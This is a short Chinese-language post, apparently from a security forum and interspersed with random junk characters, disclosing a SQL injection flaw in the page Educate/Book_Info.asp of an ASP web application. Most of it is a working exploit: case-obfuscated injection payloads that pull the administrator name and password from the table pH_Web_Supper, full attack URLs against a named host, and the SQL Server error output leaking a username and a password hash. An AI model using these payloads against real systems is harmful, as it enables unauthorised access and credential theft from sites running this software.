漏洞出现在Educate/Book_Info.asp
( i5 c5 R- p6 U1 t' U3 T+ C8 B此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出1 m7 B# D+ I4 n5 I# o
exp:如下0 C1 `3 _2 C2 e) P7 p7 {
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ \/ E2 d$ s" n& |6 {; F: @
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
, s7 v; `) D; M( nhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 t% j, R# L- R: _& R1 u8 jMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
2 x8 g8 N$ U% O) j7 p将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。8 l/ g/ c* w) \8 O' [3 f0 n
/Educate/Book_Info.asp,行 8$ j' }1 X$ a( i9 y) J+ X
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
) x2 `, n6 }! m: q+ Z, D) f+ b2 FMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
3 v0 P1 F, e4 Q$ h6 S$ V+ b9 j+ ~将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
9 l2 c$ t, K7 b+ x; f/Educate/Book_Info.asp,行 8 |